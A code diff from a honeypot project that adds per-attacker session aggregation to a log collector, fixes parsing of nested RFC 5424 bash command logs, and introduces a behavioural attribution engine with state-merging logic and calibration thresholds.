if event_type == "command":
|
||||||
|
self._cmds.setdefault(attacker_ip, []).append((ts, parsed))
|
||||||
|
return
|
||||||
|
if event_type == "session_recorded":
|
||||||
|
self._emit_session(parsed, attacker_ip, ts)
|
||||||
|
|
||||||
|
def _evict_expired(self, now: datetime) -> None:
|
||||||
|
"""Drop commands older than ``self._ttl`` seconds."""
|
||||||
|
cutoff = now.timestamp() - self._ttl
|
||||||
|
for ip, entries in list(self._cmds.items()):
|
||||||
|
kept = [(t, p) for t, p in entries if t.timestamp() >= cutoff]
|
||||||
|
if kept:
|
||||||
|
self._cmds[ip] = kept
|
||||||
|
else:
|
||||||
|
del self._cmds[ip]
|
||||||
|
|
||||||
|
def _emit_session(
|
||||||
|
self, parsed: dict[str, Any], attacker_ip: str, ended_at: datetime,
|
||||||
|
) -> None:
|
||||||
|
"""Build an ``attacker.session.ended`` envelope and publish it.
|
||||||
|
|
||||||
|
Slices the per-IP deque to commands whose timestamp falls
|
||||||
|
inside ``[ended_at - duration_s, ended_at]``. Commands stay in
|
||||||
|
the deque after the slice — the TTL eviction is the only path
|
||||||
|
that drops them, so two back-to-back sessions for the same IP
|
||||||
|
share the visible window without losing rows.
|
||||||
|
"""
|
||||||
|
fields = parsed.get("fields", {}) or {}
|
||||||
|
duration_raw = fields.get("duration_s") or "0"
|
||||||
|
try:
|
||||||
|
duration_s = float(duration_raw)
|
||||||
|
except (TypeError, ValueError):
|
||||||
|
duration_s = 0.0
|
||||||
|
sid = str(fields.get("sid") or "")
|
||||||
|
service = str(fields.get("service") or parsed.get("service") or "")
|
||||||
|
decky = parsed.get("decky") or ""
|
||||||
|
|
||||||
|
commands_window = self._cmds.get(attacker_ip, [])
|
||||||
|
cutoff_lo = ended_at.timestamp() - max(duration_s, 0.0)
|
||||||
|
commands: list[dict[str, Any]] = []
|
||||||
|
for idx, (cmd_ts, cmd_parsed) in enumerate(commands_window):
|
||||||
|
if cmd_ts.timestamp() < cutoff_lo:
|
||||||
|
continue
|
||||||
|
cmd_fields = cmd_parsed.get("fields", {}) or {}
|
||||||
|
# Pull structured uid/user/src/pwd/command from the bash
|
||||||
|
# msg body. The inspector renders these as separate
|
||||||
|
# key/value rows, which is much friendlier than dumping
|
||||||
|
# the raw ``CMD uid=0 user=... cmd=...`` string into a
|
||||||
|
# single ``command_text`` blob.
|
||||||
|
parsed_kv = _parse_cmd_msg(str(cmd_parsed.get("msg", "")))
|
||||||
|
cmd_text = (
|
||||||
|
cmd_fields.get("command")
|
||||||
|
or cmd_fields.get("cmd")
|
||||||
|
or parsed_kv.get("command")
|
||||||
|
or cmd_parsed.get("msg", "")
|
||||||
|
)
|
||||||
|
entry: dict[str, Any] = {
|
||||||
|
"id": f"{sid}#{idx}" if sid else f"{attacker_ip}-{cmd_ts.isoformat()}",
|
||||||
|
"command_text": str(cmd_text),
|
||||||
|
"ts": cmd_ts.isoformat(),
|
||||||
|
"decky": cmd_parsed.get("decky", ""),
|
||||||
|
"service": cmd_parsed.get("service", ""),
|
||||||
|
}
|
||||||
|
for key in ("uid", "user", "src", "pwd"):
|
||||||
|
value = parsed_kv.get(key) or cmd_fields.get(key)
|
||||||
|
if value is not None:
|
||||||
|
entry[key] = value
|
||||||
|
commands.append(entry)
|
||||||
|
|
||||||
|
# Resolve the asciinema shard so consumers (notably the BEHAVE-SHELL
|
||||||
|
# session-ended handler in the profiler worker) don't each have to
|
||||||
|
# disk-reach independently. Shard fields can be malformed or the
|
||||||
|
# transcripts dir may not exist yet — find_shard_with_sid returns
|
||||||
|
# None in those cases and we publish ``shard_path: None`` so the
|
||||||
|
# consumer skips honestly. Additive field; existing TTP consumers
|
||||||
|
# ignore it.
|
||||||
|
shard_path: str | None = None
|
||||||
|
resolve_error: str | None = None
|
||||||
|
if sid and decky and service:
|
||||||
|
try:
|
||||||
|
resolved = find_shard_with_sid(decky, service, sid)
|
||||||
|
except (ValueError, OSError, PermissionError) as exc:
|
||||||
|
resolve_error = f"{type(exc).__name__}: {exc}"
|
||||||
|
resolved = None
|
||||||
|
if resolved is not None:
|
||||||
|
shard_path = str(resolved)
|
||||||
|
if shard_path is None and sid:
|
||||||
|
# Loud-by-default — the BEHAVE-SHELL handler will skip
|
||||||
|
# session.ended events with shard_path=None, so a silent
|
||||||
|
# miss here means the profiler panel never hydrates. Surface
|
||||||
|
# the most common failure modes inline so the operator can
|
||||||
|
# diagnose without grepping decnet/artifacts/shards.py.
|
||||||
|
#
|
||||||
|
# 1. ARTIFACTS_ROOT not readable by the collector's user
|
||||||
|
# (perm 0750 decnet:decnet vs. User=anti without
|
||||||
|
# SupplementaryGroups=decnet).
|
||||||
|
# 2. service whitelist (_SERVICE_RE accepts ssh|telnet only).
|
||||||
|
# 3. sessrec hasn't flushed the shard for this sid yet
|
||||||
|
# (collector tick won the race; next tick recovers).
|
||||||
|
logger.warning(
|
||||||
|
"collector: shard_path=None decky=%s service=%s sid=%s "
|
||||||
|
"(error=%s) — profiler will skip this session.ended; "
|
||||||
|
"check ARTIFACTS_ROOT perms / service whitelist",
|
||||||
|
decky, service, sid, resolve_error or "shard not found",
|
||||||
|
)
|
||||||
|
|
||||||
|
payload: dict[str, Any] = {
|
||||||
|
"session_id": sid or None,
|
||||||
|
"attacker_uuid": None, # consumer resolves via repo
|
||||||
|
"attacker_ip": attacker_ip,
|
||||||
|
"decky_id": decky,
|
||||||
|
"service": service,
|
||||||
|
"ended_at": ended_at.isoformat(),
|
||||||
|
"duration_s": duration_s,
|
||||||
|
"commands": commands,
|
||||||
|
"shard_path": shard_path,
|
||||||
|
}
|
||||||
|
topic = _topics.attacker(_topics.ATTACKER_SESSION_ENDED)
|
||||||
|
try:
|
||||||
|
self._publish(topic, payload, _topics.ATTACKER_SESSION_ENDED)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
logger.debug(
|
||||||
|
"collector: session.ended publish failed: %s", exc,
|
||||||
|
)
|
||||||
|
|
||||||
# ─── RFC 5424 parser ──────────────────────────────────────────────────────────
|
# ─── RFC 5424 parser ──────────────────────────────────────────────────────────
|
||||||
|
|
||||||
_RFC5424_RE = re.compile(
|
_RFC5424_RE = re.compile(
|
||||||
@@ -129,6 +374,27 @@ _RFC5424_RE = re.compile(
|
|||||||
r"(\S+) " # 4: MSGID (event_type)
|
r"(\S+) " # 4: MSGID (event_type)
|
||||||
r"(.+)$", # 5: SD element + optional MSG
|
r"(.+)$", # 5: SD element + optional MSG
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Honeypot SSH containers export a ``PROMPT_COMMAND`` that calls
|
||||||
|
# ``logger --rfc5424 --msgid command -p user.info -t bash "CMD …"``.
|
||||||
|
# That inner RFC 5424 line lands on the container's stdout, where the
|
||||||
|
# Docker stream reader prepends ANOTHER RFC 5424 envelope (PRI=14,
|
||||||
|
# HOSTNAME=<decky>, APP-NAME=1, MSGID=NIL). The outer parse therefore
|
||||||
|
# sees ``event_type == "-"`` while the real MSGID (``command``) is
|
||||||
|
# inside the body. We detect that case and re-extract the inner
|
||||||
|
# ``HOSTNAME APP-NAME PROCID MSGID rest`` so downstream consumers see
|
||||||
|
# ``event_type == "command"`` plus the real source hostname.
|
||||||
|
#
|
||||||
|
# Anchored on an ISO-8601 timestamp at the head of the body so we
|
||||||
|
# don't false-match free-form prose like "Connection from 1.2.3.4".
|
||||||
|
_INNER_RFC5424_RE = re.compile(
|
||||||
|
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
|
||||||
|
r"(\S+)\s+" # 2: inner HOSTNAME
|
||||||
|
r"(\S+)\s+" # 3: inner APP-NAME
|
||||||
|
r"\S+\s+" # PROCID (NIL or PID)
|
||||||
|
r"(\S+)\s+" # 4: inner MSGID
|
||||||
|
r"(.+)$", # 5: inner SD/MSG remainder
|
||||||
|
)
|
||||||
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
|
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
|
||||||
_PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
|
_PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
|
||||||
_IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
|
_IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
|
||||||
@@ -168,8 +434,23 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
|||||||
ts_raw, decky, service, event_type, sd_rest = m.groups()
|
ts_raw, decky, service, event_type, sd_rest = m.groups()
|
||||||
|
|
||||||
fields: dict[str, str] = {}
|
fields: dict[str, str] = {}
|
||||||
msg: str = ""
|
|
||||||
|
|
||||||
|
# Honeypot SSH PROMPT_COMMAND lines are double-wrapped (Docker
|
||||||
|
# stdout envelope around the inner ``logger --msgid command`` line).
|
||||||
|
# Outer MSGID is NIL; the real MSGID is inside the body. Detect
|
||||||
|
# the inner shape and re-extract HOSTNAME / APP-NAME / MSGID /
|
||||||
|
# remainder so downstream extraction sees the real header.
|
||||||
|
if event_type == "-" and sd_rest.startswith("-"):
|
||||||
|
body = sd_rest[1:].lstrip()
|
||||||
|
inner = _INNER_RFC5424_RE.match(body)
|
||||||
|
if inner is not None:
|
||||||
|
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
|
||||||
|
decky = i_host
|
||||||
|
service = i_app
|
||||||
|
event_type = i_msgid
|
||||||
|
sd_rest = i_rest
|
||||||
|
|
||||||
|
msg: str = ""
|
||||||
if sd_rest.startswith("-"):
|
if sd_rest.startswith("-"):
|
||||||
msg = sd_rest[1:].lstrip()
|
msg = sd_rest[1:].lstrip()
|
||||||
elif sd_rest.startswith("["):
|
elif sd_rest.startswith("["):
|
||||||
@@ -177,16 +458,28 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
|||||||
if block:
|
if block:
|
||||||
for k, v in _PARAM_RE.findall(block.group(1)):
|
for k, v in _PARAM_RE.findall(block.group(1)):
|
||||||
fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
|
fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
|
||||||
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
|
# Always recover the post-SD message tail, even when the SD
|
||||||
if msg_match:
|
# block isn't ``relay@55555`` (e.g. the ``timeQuality`` block
|
||||||
msg = msg_match.group(1).strip()
|
# syslog auto-emits on bash CMD lines). Without this the body
|
||||||
|
# of unwrapped PROMPT_COMMAND lines stays empty and the
|
||||||
|
# attacker_ip kv-fallback below has nothing to scan.
|
||||||
|
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
|
||||||
|
if msg_match:
|
||||||
|
msg = msg_match.group(1).strip()
|
||||||
else:
|
else:
|
||||||
msg = sd_rest
|
msg = sd_rest
|
||||||
|
|
||||||
attacker_ip = "Unknown"
|
attacker_ip = "Unknown"
|
||||||
for fname in _IP_FIELDS:
|
for fname in _IP_FIELDS:
|
||||||
if fname in fields:
|
if fname in fields:
|
||||||
attacker_ip = fields[fname]
|
raw = fields[fname]
|
||||||
|
# remote_addr may be "host:port" — split so identity keys on IP only.
|
||||||
|
host, _, port = raw.rpartition(":")
|
||||||
|
if host and port.isdigit():
|
||||||
|
attacker_ip = host.strip("[]") # handle [::1]:port IPv6 form
|
||||||
|
fields.setdefault("remote_port", port)
|
||||||
|
else:
|
||||||
|
attacker_ip = raw
|
||||||
break
|
break
|
||||||
|
|
||||||
# Fallback for plain `logger` callers that don't use SD params (notably
|
# Fallback for plain `logger` callers that don't use SD params (notably
|
||||||
@@ -220,6 +513,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
|||||||
except ValueError:
|
except ValueError:
|
||||||
ts_formatted = ts_raw
|
ts_formatted = ts_raw
|
||||||
|
|
||||||
|
# Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
|
||||||
|
# "CMD ") get event_type rewritten to "command". `fields` stays empty
|
||||||
|
# so the frontend's msg-based pill rendering doesn't double up.
|
||||||
|
if event_type == "-" and msg.startswith("CMD "):
|
||||||
|
event_type = "command"
|
||||||
|
|
||||||
return {
|
return {
|
||||||
"timestamp": ts_formatted,
|
"timestamp": ts_formatted,
|
||||||
"decky": decky,
|
"decky": decky,
|
||||||
@@ -346,7 +645,7 @@ def _stream_container(
|
|||||||
publish_fn: CollectorPublishFn | None = None,
|
publish_fn: CollectorPublishFn | None = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""Stream logs from one container and append to the host log files."""
|
"""Stream logs from one container and append to the host log files."""
|
||||||
import docker # type: ignore[import]
|
import docker
|
||||||
|
|
||||||
lf: Optional[Any] = None
|
lf: Optional[Any] = None
|
||||||
jf: Optional[Any] = None
|
jf: Optional[Any] = None
|
||||||
@@ -416,12 +715,17 @@ def _make_system_log_publisher(
|
|||||||
thread can call it unconditionally. Otherwise each call is marshalled
|
thread can call it unconditionally. Otherwise each call is marshalled
|
||||||
onto *loop* (the asyncio event loop that owns the bus socket) via
|
onto *loop* (the asyncio event loop that owns the bus socket) via
|
||||||
``make_thread_safe_publisher``.
|
``make_thread_safe_publisher``.
|
||||||
|
|
||||||
|
The same call also feeds a :class:`_SessionAggregator` so shell
|
||||||
|
commands are indexed per-attacker_ip and ``attacker.session.ended``
|
||||||
|
fires whenever the SSH ``sessrec`` worker logs ``session_recorded``.
|
||||||
"""
|
"""
|
||||||
raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
|
raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
|
||||||
if raw_publish is None:
|
if raw_publish is None:
|
||||||
return lambda _parsed: None
|
return lambda _parsed: None
|
||||||
|
|
||||||
topic = _topics.system(_topics.SYSTEM_LOG)
|
topic = _topics.system(_topics.SYSTEM_LOG)
|
||||||
|
aggregator = _SessionAggregator(raw_publish)
|
||||||
|
|
||||||
def _publish(parsed: dict[str, Any]) -> None:
|
def _publish(parsed: dict[str, Any]) -> None:
|
||||||
event_type = parsed.get("event_type", "")
|
event_type = parsed.get("event_type", "")
|
||||||
@@ -436,6 +740,7 @@ def _make_system_log_publisher(
|
|||||||
},
|
},
|
||||||
event_type,
|
event_type,
|
||||||
)
|
)
|
||||||
|
aggregator.add_event(parsed)
|
||||||
|
|
||||||
return _publish
|
return _publish
|
||||||
|
|
||||||
@@ -450,7 +755,7 @@ async def log_collector_worker(log_file: str) -> None:
|
|||||||
|
|
||||||
Watches Docker events to pick up containers started after initial scan.
|
Watches Docker events to pick up containers started after initial scan.
|
||||||
"""
|
"""
|
||||||
import docker # type: ignore[import]
|
import docker
|
||||||
|
|
||||||
log_path = Path(log_file)
|
log_path = Path(log_file)
|
||||||
json_path = log_path.with_suffix(".json")
|
json_path = log_path.with_suffix(".json")
|
||||||
|
|||||||
@@ -39,6 +39,7 @@ Shape::
|
|||||||
master-host = 10.0.0.1 # required on agents
|
master-host = 10.0.0.1 # required on agents
|
||||||
syslog-port = 6514
|
syslog-port = 6514
|
||||||
swarmctl-port = 8770
|
swarmctl-port = 8770
|
||||||
|
swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl`
|
||||||
|
|
||||||
[logging]
|
[logging]
|
||||||
system-log = /var/log/decnet/decnet.system.log
|
system-log = /var/log/decnet/decnet.system.log
|
||||||
@@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
|
|||||||
"master-host": "DECNET_SWARM_MASTER_HOST",
|
"master-host": "DECNET_SWARM_MASTER_HOST",
|
||||||
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
|
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
|
||||||
"swarmctl-port": "DECNET_SWARMCTL_PORT",
|
"swarmctl-port": "DECNET_SWARMCTL_PORT",
|
||||||
|
"swarmctl-host": "DECNET_SWARMCTL_HOST",
|
||||||
},
|
},
|
||||||
"logging": {
|
"logging": {
|
||||||
"system-log": "DECNET_SYSTEM_LOGS",
|
"system-log": "DECNET_SYSTEM_LOGS",
|
||||||
|
|||||||
21
decnet/correlation/attribution/__init__.py
Normal file
21
decnet/correlation/attribution/__init__.py
Normal file
@@ -0,0 +1,21 @@
|
|||||||
|
"""DECNET attribution engine — v0 aggregation library.
|
||||||
|
|
||||||
|
Pure library: per-(identity, primitive) state machine over BEHAVE-SHELL
|
||||||
|
observations. No I/O, no bus, no DB. The bus subscriber and DB writes
|
||||||
|
live in :mod:`decnet.correlation.attribution_worker` so this package
|
||||||
|
stays trivially testable with synthetic observation lists.
|
||||||
|
|
||||||
|
See ``development/ATTRIBUTION-ENGINE.md`` for the full design and the
|
||||||
|
explicit bright line: this engine does NOT do persona classification
|
||||||
|
(HUMAN/LLM/SCRIPTED), does NOT gate access, does NOT attribute to
|
||||||
|
named persons. It surfaces *behavioural coherence* and *behavioural
|
||||||
|
drift*, and stops there.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from decnet.correlation.attribution.aggregate import (
|
||||||
|
AttributionState,
|
||||||
|
aggregate_observations,
|
||||||
|
)
|
||||||
|
|
||||||
|
__all__ = ["AttributionState", "aggregate_observations"]
|
||||||
62
decnet/correlation/attribution/_thresholds.py
Normal file
62
decnet/correlation/attribution/_thresholds.py
Normal file
@@ -0,0 +1,62 @@
|
|||||||
|
"""Calibration thresholds for the attribution engine — every magic
|
||||||
|
number lives here, named, with the calibration source cited.
|
||||||
|
|
||||||
|
v0 values are heuristic. Real calibration ships when red-team
|
||||||
|
exercises produce labelled trace data
|
||||||
|
(``ATTRIBUTION-ENGINE.md`` §"Out of scope"). Until then these constants
|
||||||
|
are the engine's only knobs; aggregate.py never embeds a literal.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
# ── Categorical merger ────────────────────────────────────────────────
|
||||||
|
# Last-N window size for the categorical state machine. 5 calibrates
|
||||||
|
# against typical session counts (most attackers are observed < 10
|
||||||
|
# times before they go quiet — ATTRIBUTION-ENGINE.md §"Open question
|
||||||
|
# 2"). Operators with long-running attackers will want a wider window
|
||||||
|
# in v1.
|
||||||
|
CATEGORICAL_WINDOW_N = 5
|
||||||
|
|
||||||
|
# Minimum observations before the merger emits anything other than
|
||||||
|
# ``unknown``. Below this floor the state machine has no signal.
|
||||||
|
MIN_OBSERVATIONS_FOR_STATE = 3
|
||||||
|
|
||||||
|
# Categorical merger is one-outlier-tolerant: in a window of N=5, the
|
||||||
|
# state is ``stable`` if at least ``MAJORITY_THRESHOLD`` agree.
|
||||||
|
CATEGORICAL_MAJORITY_THRESHOLD = 4
|
||||||
|
|
||||||
|
# ── Numeric merger ────────────────────────────────────────────────────
|
||||||
|
# EWMA smoothing factor for numeric primitives. 0.3 weights recent
|
||||||
|
# observations enough to surface drift quickly without flapping on
|
||||||
|
# single outliers.
|
||||||
|
NUMERIC_EWMA_ALPHA = 0.3
|
||||||
|
|
||||||
|
# Coefficient-of-variation thresholds: dispersion / |mean|.
|
||||||
|
NUMERIC_STABLE_DISPERSION_PCT = 0.20 # < 20% of mean → stable
|
||||||
|
NUMERIC_DRIFT_MEAN_SHIFT_PCT = 0.30 # mean moved > 30% → drifting
|
||||||
|
NUMERIC_CONFLICT_DISPERSION_PCT = 1.0 # > 100% of mean → conflicted
|
||||||
|
|
||||||
|
# ── Hash merger ───────────────────────────────────────────────────────
|
||||||
|
# Rotations within HASH_DRIFT_WINDOW count toward state transitions.
|
||||||
|
# Below DRIFT_MAX → drifting; above → conflicted. The values mirror the
|
||||||
|
# DEBT-032 fingerprint-rotation calibration — bumped by one because
|
||||||
|
# the attribution engine takes one rotation as evidence-of-life, not
|
||||||
|
# yet evidence-of-drift.
|
||||||
|
HASH_DRIFT_MAX = 2
|
||||||
|
HASH_DRIFT_WINDOW_SECS = 24 * 60 * 60 # 24h
|
||||||
|
|
||||||
|
# ── Multi-actor cap ───────────────────────────────────────────────────
|
||||||
|
# multi_actor confidence is capped to keep the dashboard honest about
|
||||||
|
# how noisy this signal is. ATTRIBUTION-ENGINE.md §"Open question 1":
|
||||||
|
# flapping primitives on flaky networks look like two operators.
|
||||||
|
MULTI_ACTOR_MAX_CONFIDENCE = 0.6
|
||||||
|
|
||||||
|
# ── Cross-primitive correlator (Phase 5) ──────────────────────────────
|
||||||
|
# Minimum number of primitives that must independently flag
|
||||||
|
# ``multi_actor`` for the same identity before
|
||||||
|
# ``attribution.profile.multi_actor_suspected`` fires.
|
||||||
|
MULTI_ACTOR_MIN_PRIMITIVES = 2
|
||||||
|
|
||||||
|
# Tick interval for the periodic walk in
|
||||||
|
# :mod:`decnet.correlation.attribution_worker`. Configurable via env
|
||||||
|
# var in v1; hardcoded in v0.
|
||||||
|
MULTI_ACTOR_TICK_SECS = 60.0
|
||||||
418
decnet/correlation/attribution/aggregate.py
Normal file
418
decnet/correlation/attribution/aggregate.py
Normal file
@@ -0,0 +1,418 @@
|
|||||||
|
"""Per-(identity, primitive) state-machine — the attribution engine's
|
||||||
|
core merge logic.
|
||||||
|
|
||||||
|
Pure: given a list of BEHAVE observations for one
|
||||||
|
``(identity_uuid, primitive)`` pair (already ordered by ``ts`` ASC),
|
||||||
|
returns the derived state. No DB, no bus, no I/O. The worker
|
||||||
|
(``decnet.correlation.attribution_worker``) is responsible for loading
|
||||||
|
the observations and writing the state row.
|
||||||
|
|
||||||
|
State vocabulary is frozen at five values (see
|
||||||
|
``ATTRIBUTION-ENGINE.md``):
|
||||||
|
|
||||||
|
* ``unknown`` — < ``MIN_OBSERVATIONS_FOR_STATE`` observations
|
||||||
|
* ``stable`` — recent N agree
|
||||||
|
* ``drifting`` — recent N stable but disagree with older N
|
||||||
|
* ``conflicted`` — recent N split
|
||||||
|
* ``multi_actor`` — conflicted + cross-session alternation pattern
|
||||||
|
|
||||||
|
Phase 2 ships :func:`_aggregate_categorical` (the dominant ValueKind
|
||||||
|
for BEHAVE-SHELL primitives). Phase 3 adds numeric + hash mergers and
|
||||||
|
the ValueKind dispatcher in :func:`aggregate_observations`.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from collections import Counter
|
||||||
|
from dataclasses import dataclass
|
||||||
|
from typing import Any, Sequence
|
||||||
|
|
||||||
|
from decnet.correlation.attribution import _thresholds as _T
|
||||||
|
|
||||||
|
__all__ = [
|
||||||
|
"AttributionState",
|
||||||
|
"aggregate_observations",
|
||||||
|
"aggregate_categorical",
|
||||||
|
"aggregate_numeric",
|
||||||
|
"aggregate_hash",
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass(frozen=True)
|
||||||
|
class AttributionState:
|
||||||
|
"""Output of the merger for one ``(identity, primitive)`` pair.
|
||||||
|
|
||||||
|
The fields map onto :class:`AttributionStateRow` columns; the
|
||||||
|
worker composes the final dict for ``upsert_attribution_state``
|
||||||
|
by adding ``identity_uuid`` + ``primitive`` (the merger does not
|
||||||
|
own the natural key) and a ``last_change_ts`` derived from the
|
||||||
|
prior row.
|
||||||
|
"""
|
||||||
|
|
||||||
|
current_value: Any
|
||||||
|
state: str
|
||||||
|
confidence: float
|
||||||
|
observation_count: int
|
||||||
|
last_observation_ts: float
|
||||||
|
|
||||||
|
|
||||||
|
def aggregate_observations(
|
||||||
|
observations: Sequence[dict[str, Any]],
|
||||||
|
*,
|
||||||
|
value_kind: str | None = None,
|
||||||
|
) -> AttributionState:
|
||||||
|
"""Run the merger over *observations* and return derived state.
|
||||||
|
|
||||||
|
*observations* is a list of dicts with at minimum ``value``,
|
||||||
|
``ts``, ``confidence`` (matching
|
||||||
|
``ObservationRow.observations_time_series`` output). Sessions
|
||||||
|
are derived from the ``ts`` axis — the merger does not need a
|
||||||
|
separate session id; cross-session alternation is detected by
|
||||||
|
the gap distribution. Sessions are NOT collapsed before the
|
||||||
|
merger; ``multi_actor`` reasons over the full per-observation
|
||||||
|
series.
|
||||||
|
|
||||||
|
*value_kind* is a hint from the BEHAVE primitive registry — Phase
|
||||||
|
2 only honours ``"categorical"`` (or ``None``, treated as
|
||||||
|
categorical). Phase 3 will dispatch on ``"numeric"`` /
|
||||||
|
``"hash"`` to the matching merger.
|
||||||
|
"""
|
||||||
|
if not observations:
|
||||||
|
return _unknown(0.0, count=0)
|
||||||
|
if value_kind in (None, "categorical"):
|
||||||
|
return aggregate_categorical(observations)
|
||||||
|
if value_kind == "numeric":
|
||||||
|
return aggregate_numeric(observations)
|
||||||
|
if value_kind == "hash":
|
||||||
|
return aggregate_hash(observations)
|
||||||
|
raise ValueError(
|
||||||
|
f"aggregate_observations: unknown value_kind={value_kind!r}; "
|
||||||
|
"expected 'categorical' | 'numeric' | 'hash' | None",
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def aggregate_numeric(
|
||||||
|
observations: Sequence[dict[str, Any]],
|
||||||
|
) -> AttributionState:
|
||||||
|
"""Numeric merger — for primitives whose ``value`` is an int /
|
||||||
|
float (e.g. ``toolchain.c2.beacon_interval_ms``,
|
||||||
|
``motor.paste_burst_rate``).
|
||||||
|
|
||||||
|
Compares the EWMA of the recent window against the EWMA of the
|
||||||
|
older window; reports dispersion as coefficient of variation.
|
||||||
|
|
||||||
|
* < ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
|
||||||
|
* recent CV < ``NUMERIC_STABLE_DISPERSION_PCT`` *and* mean shift
|
||||||
|
from older window < ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``stable``
|
||||||
|
* mean shifted >= ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``drifting``
|
||||||
|
* recent CV > ``NUMERIC_CONFLICT_DISPERSION_PCT`` → ``conflicted``
|
||||||
|
* otherwise → ``stable`` (falling-through case for moderate
|
||||||
|
dispersion that hasn't yet become drift)
|
||||||
|
|
||||||
|
Confidence on stable/drifting is ``1 - min(CV, 1.0)`` —
|
||||||
|
tighter dispersion = higher confidence. Conflicted is ``0.5``
|
||||||
|
by convention; we cannot meaningfully claim certainty in a
|
||||||
|
statistic computed over a degenerate sample.
|
||||||
|
|
||||||
|
``current_value`` is the recent EWMA, not the last raw
|
||||||
|
observation: numeric primitives are noisy by nature and
|
||||||
|
surfacing the smoothed estimate keeps the dashboard from
|
||||||
|
flapping on every tick. ``multi_actor`` is *not* a numeric state
|
||||||
|
in v0 — bimodal distributions belong to the categorical
|
||||||
|
detector once the primitive's value space is bucketed.
|
||||||
|
"""
|
||||||
|
n = len(observations)
|
||||||
|
last_ts = float(observations[-1].get("ts", 0.0)) if observations else 0.0
|
||||||
|
if n < _T.MIN_OBSERVATIONS_FOR_STATE:
|
||||||
|
return AttributionState(
|
||||||
|
current_value=_safe_float(observations[-1].get("value")) if n else None,
|
||||||
|
state="unknown",
|
||||||
|
confidence=0.0,
|
||||||
|
observation_count=n,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
|
|
||||||
|
window = _T.CATEGORICAL_WINDOW_N
|
||||||
|
recent_vals = [_safe_float(o.get("value")) for o in observations[-window:]]
|
||||||
|
older_vals = [
|
||||||
|
_safe_float(o.get("value"))
|
||||||
|
for o in observations[-2 * window: -window]
|
||||||
|
]
|
||||||
|
recent_mean = _ewma(recent_vals, _T.NUMERIC_EWMA_ALPHA)
|
||||||
|
recent_cv = _coef_of_variation(recent_vals, recent_mean)
|
||||||
|
|
||||||
|
if recent_cv > _T.NUMERIC_CONFLICT_DISPERSION_PCT:
|
||||||
|
return AttributionState(
|
||||||
|
current_value=recent_mean,
|
||||||
|
state="conflicted",
|
||||||
|
confidence=0.5,
|
||||||
|
observation_count=n,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
|
|
||||||
|
if older_vals:
|
||||||
|
older_mean = _ewma(older_vals, _T.NUMERIC_EWMA_ALPHA)
|
||||||
|
denom = abs(older_mean) if older_mean != 0 else 1.0
|
||||||
|
mean_shift = abs(recent_mean - older_mean) / denom
|
||||||
|
if mean_shift >= _T.NUMERIC_DRIFT_MEAN_SHIFT_PCT:
|
||||||
|
return AttributionState(
|
||||||
|
current_value=recent_mean,
|
||||||
|
state="drifting",
|
||||||
|
confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
|
||||||
|
observation_count=n,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
|
|
||||||
|
return AttributionState(
|
||||||
|
current_value=recent_mean,
|
||||||
|
state="stable",
|
||||||
|
confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
|
||||||
|
observation_count=n,
|
||||||
|
last_observation_ts=last_ts,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def aggregate_hash(
|
||||||
|
observations: Sequence[dict[str, Any]],
|
||||||
|
) -> AttributionState:
|
||||||
|
"""Hash merger — for rotation-resistant fingerprints
|
||||||
|
(``toolchain.tls.jarm_server``, ``toolchain.ssh.hassh_client``).
|
||||||
|
|
||||||
|
The merger does NOT recompute hashes; DEBT-032
|
||||||
|
(``decnet.correlation.fingerprint_rotation``) already produces
|
||||||
|
one observation per rotation event. The state machine counts
|
||||||
|
distinct hash values inside ``HASH_DRIFT_WINDOW_SECS`` of the
|
||||||
|
most recent observation:
|
||||||
|
|
||||||
|
* 0 rotations (single hash, any count) → ``stable``
|
||||||
|
* 1 to ``HASH_DRIFT_MAX`` rotations within window → ``drifting``
|
||||||
|
* > ``HASH_DRIFT_MAX`` rotations within window → ``conflicted``
|
||||||
|
|
||||||
|
``unknown`` fires only on empty input — a single hash with one
|
||||||
|
observation is enough signal to say "stable", because hashes
|
||||||
|
don't have a noisy baseline the way categorical/numeric
